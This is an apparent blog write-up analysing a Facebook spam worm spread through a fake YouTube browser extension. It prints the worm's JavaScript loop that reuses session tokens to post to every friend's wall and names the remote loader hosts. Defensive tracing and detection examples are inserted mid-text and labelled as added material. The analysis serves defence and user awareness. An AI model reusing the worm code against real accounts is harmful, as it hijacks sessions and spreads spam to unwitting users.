Analysis of a Facebook spam exploited through browser add-ons/extensions

Prajwal Panchmahalkar
panchmahalkar@gmail.com

Image courtesy: http://contactdubai.com

Spam on Facebook is not new to us, but I found this particular spam very smartly
leveraged, and it made for a very interesting analysis because I was surprised to see to what
extent the spammers can go. Today one of my friends on Facebook was very annoyed by this
spam, which was being posted on all his friends' walls and looked like this:




I was asked what to do. Looking at it, it surely looked just like every other spam, so I
suggested all the usual measures, like removing all his doubtful Facebook applications
and clearing his browser data. But it continued even after that, so I decided to look into
it.

First the URL: the spam seems to have originated from http:// nwuuwiwiwiw.blogspot.com/.
Looking at the blog, it looked like this:




Interesting! It needs a Divx plug-in, yet it asks to install a YouTube Premium plugin
(wonder what a “premium” for YouTube would be!!).
So I decided to look into the page source; here is what it contained:




So this would install the browser add-on/extension matching the browser. The else part of the
code made sense to me, as it has to go further if the browser is not Firefox or Chrome; let’s
look into the PHP of the else part later. I downloaded the Firefox “YouTube” add-on and
extracted it; youtube.js was the file to look into:




Ah, http://mieneeueueu.co.cc/yt/script.js, a remote script.
Navigating to it I found:




Another script, at http://mieneeueueu.co.cc/yt/extra.js; finally, this was the final script ;)
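
The chain just described (youtube.js inside the add-on, then script.js, then extra.js) can be mapped offline once each stage has been saved. The following is an added example, not part of the original analysis: it follows remote .js references through a saved corpus, records each stage and reports URLs that were referenced but never captured. The corpus contents and the loader.example / static.example hosts are constructed placeholders; only the file names follow the write-up.

```javascript
// Added example: the corpus is constructed and the hosts are placeholders.
// Matches http(s) URLs whose path ends in .js (a query string may follow).
const SCRIPT_URL = /https?:\/\/[^\s'"<>)]+?\.js(?=['"?#\s)]|$)/gi;

// Unique remote .js URLs referenced anywhere in a source string.
function remoteScriptRefs(source) {
  return [...new Set(source.match(SCRIPT_URL) || [])];
}

// corpus: Map(name or URL -> saved source). Walks breadth-first from `entry`,
// visits each stage once (so loops terminate) and stops after maxDepth hops.
function followLoaderChain(entry, corpus, maxDepth = 5) {
  const stages = [];
  const missing = [];
  const seen = new Set();
  let frontier = [entry];
  for (let depth = 0; frontier.length > 0 && depth <= maxDepth; depth++) {
    const next = [];
    for (const name of frontier) {
      if (seen.has(name)) continue;
      seen.add(name);
      if (!corpus.has(name)) { missing.push(name); continue; }
      const loads = remoteScriptRefs(corpus.get(name));
      stages.push({ name, depth, loads });
      next.push(...loads);
    }
    frontier = next;
  }
  return {
    stages,
    // Stages that were fetched at run time rather than shipped in the package.
    remoteStages: stages.filter((s) => /^https?:/i.test(s.name)).map((s) => s.name),
    missing,
  };
}

// Constructed corpus: one packaged file and two saved remote stages.
const HOST = 'http://loader.example/yt';
const CORPUS = new Map([
  ['addon/youtube.js',
    "var s = document.createElement('script');\ns.src = '" + HOST + "/script.js';"],
  [HOST + '/script.js',
    "var t = document.createElement('script'); t.src = \"" + HOST + "/extra.js\";"],
  [HOST + '/extra.js',
    "var again = '" + HOST + "/script.js'; var lib = 'http://static.example/lib.js?v=2';\n" +
    "location.href = '" + HOST + "/video.php';"],
]);

console.log(JSON.stringify(followLoaderChain('addon/youtube.js', CORPUS), null, 2));
```

Every entry in remoteStages is code that was not in the package when it was installed and can be changed by whoever controls the host.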

Now let’s analyze extra.js.

Remember the else part in the first code snippet, which I promised to discuss later? It
contained a link to http://mieneeueueu.co.cc/yt/video.php. The file extra.js also contains this
part, to redirect the user to this URL after the add-on/extension is installed. Navigating
to that link I found:




This page actually contained the video, embedded; finally the person must be happy to see
this video (however, the comments at the bottom are not real, it’s an image; stupid and smart) ;)
As the person views the video and finishes it, this script stealing the browser cookies gets
enough time to spread the spam on all the friends’ walls.



Further analyzing the code,




The code here assigns some random variables for the post so that it won’t be identical on all the
walls. The variables from post_form_id to var p3 are combined to make a large number of
combinations (use of mathematical combinations, smart eh?).



Looking into the main part of the code, where the message is generated and sent as a post:

// Loop over every friend entry except the logged-in user.
for (var f = 0; f < b; f++) {
    if (a['payload']['entries'][f]['uid'] != user_id) {
        // Message: random opener + friend's first name (lower-cased) + random filler.
        message = [randomValue(p1),
                   a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](),
                   randomValue(p2), randomValue(p3)]['join'](' ');
        var g = new XMLHttpRequest();
        d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
        title = '[VIDEO] Yeahh!! It happens on Live Television!';
        summary = 'Lol Checkout this video its very embracing moment for her';
        imagen = 'http://i.imgur.com/f9PE7.jpg';
        // Request body: reuses the session's post_form_id and fb_dtsg form tokens
        // and targets the friend's wall through xhpc_targetid.
        e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
            '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] +
            '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' +
            randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) +
            '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title +
            '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) +
            '&attachment[params][url]=' + randomValue(video_url) +
            '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() +
            '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen +
            '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message +
            '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
        g['open']('POST', d, true);
        g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
        g['setRequestHeader']('Content-length', e['length']);
        g['setRequestHeader']('Connection', 'keep-alive');
        // The response is ignored.
        g['onreadystatechange'] = function () {};
        g['send'](e);
    }
}




Looking at the above snippet of code, it is clear that it uses the grabbed cookies to post the
spam on others’ walls. The script also contained an unfinished part (maybe the
spammer was happy with this for now, or wants to grab some time from the user to finish the spam
effectively) with a link to http://rihannaxgirlzke.blogspot.com/, which looked like:




However, looking into the source, it didn’t contain any script; rather, it was a static page
whose content was actually an image file.
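
The composer request analysed above can also be recognised from captured traffic. The following is an added example, not code from the original write-up: it parses composer.php POST bodies and flags the traits visible in the snippet (one title sent to many walls in a burst, link hosts that rotate per post, a YouTube favicon on a non-YouTube link). Field names come from the snippet; thresholds, function names and every sample value are assumptions, and the sample bodies are constructed.

```javascript
// Added example: thresholds, names and all sample values are assumptions.
const YOUTUBE_DOMAINS = ['youtube.com', 'youtu.be'];
const YOUTUBE_ASSET_DOMAINS = ['ytimg.com', ...YOUTUBE_DOMAINS];

function hostOf(value) {
  try { return new URL(value).hostname.toLowerCase(); } catch (_) { return null; }
}

function isUnder(host, domains) {
  return host !== null && domains.some((d) => host === d || host.endsWith('.' + d));
}

// Pull the fields used for triage out of one form-urlencoded composer body.
function parseComposerPost(body) {
  const p = new URLSearchParams(body);
  return {
    target: p.get('xhpc_targetid'),
    title: p.get('attachment[params][title]') || '',
    linkHost: hostOf(p.get('attachment[params][url]') || ''),
    faviconHost: hostOf(p.get('attachment[params][favicon]') || ''),
  };
}

// Largest number of distinct walls written to inside any window of windowSec.
function maxTargetsInWindow(posts, windowSec) {
  let best = 0;
  for (let i = 0; i < posts.length; i++) {
    const seen = new Set();
    for (let j = i; j < posts.length && posts[j].ts - posts[i].ts <= windowSec; j++) {
      seen.add(posts[j].target);
    }
    best = Math.max(best, seen.size);
  }
  return best;
}

// requests: [{ ts: <seconds>, body: <string> }] captured from one browser session.
function triageSession(requests, { minTargets = 3, windowSec = 60 } = {}) {
  const byTitle = new Map();
  for (const { ts, body } of requests) {
    const post = { ts, ...parseComposerPost(body) };
    if (!post.target || !post.title) continue; // not a link post to a wall
    if (!byTitle.has(post.title)) byTitle.set(post.title, []);
    byTitle.get(post.title).push(post);
  }
  const alerts = [];
  for (const [title, posts] of byTitle) {
    posts.sort((x, y) => x.ts - y.ts);
    const reasons = [];
    if (maxTargetsInWindow(posts, windowSec) >= minTargets) reasons.push('burst-to-many-walls');
    if (new Set(posts.map((x) => x.linkHost)).size > 1) reasons.push('rotating-link-hosts');
    if (posts.some((x) => isUnder(x.faviconHost, YOUTUBE_ASSET_DOMAINS) &&
                          !isUnder(x.linkHost, YOUTUBE_DOMAINS))) {
      reasons.push('youtube-branding-on-foreign-link');
    }
    if (reasons.length) alerts.push({ title, posts: posts.length, reasons });
  }
  return alerts;
}

// Constructed sample: three spam-style posts and one ordinary YouTube share.
const FAVICON = 'http://s.ytimg.com/yt/favicon-vflZlzSbU.ico';
const SPAM_TITLE = '[VIDEO] Yeahh!! It happens on Live Television!';
const sampleBody = (target, title, url) =>
  'post_form_id=PLACEHOLDER&fb_dtsg=PLACEHOLDER&xhpc_targetid=' + target +
  '&attachment[params][favicon]=' + FAVICON + '&attachment[params][title]=' + title +
  '&attachment[params][url]=' + url + '&xhpc_message=hi';
const SAMPLE = [
  { ts: 0, body: sampleBody('1001', SPAM_TITLE, 'http://video-one.example/') },
  { ts: 2, body: sampleBody('1002', SPAM_TITLE, 'http://video-two.example/') },
  { ts: 4, body: sampleBody('1003', SPAM_TITLE, 'http://video-one.example/') },
  { ts: 900, body: sampleBody('1004', 'Holiday clip', 'http://www.youtube.com/watch?v=CONSTRUCTED') },
];
console.log(JSON.stringify(triageSession(SAMPLE), null, 2));
```
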
Conclusion:

Though social networking sites often fall prey to such scams/spams, it is largely with the users’
consent, due to their ignorance. Most of the time, looking at the post is enough to analyze whether
it is a genuine video from a valid link. In this case:




   1. Looking at the post, the link from where the post originated is clearly youtube.com
      (underlined black).
   2. Further, the thumbnail preview for videos has been changed: the play button is now
      transparent black, while the one in the spam we discussed had a blue play button
      (underlined red).
   3. Always install extensions from known sources:
          a. Chrome – from the Chrome store
          b. Firefox – Mozilla add-ons
   4. Use add-ons like NoScript and No-Ads to avoid such scripts.
   5. Stay away from scams/spams that promise to provide some gift or money.
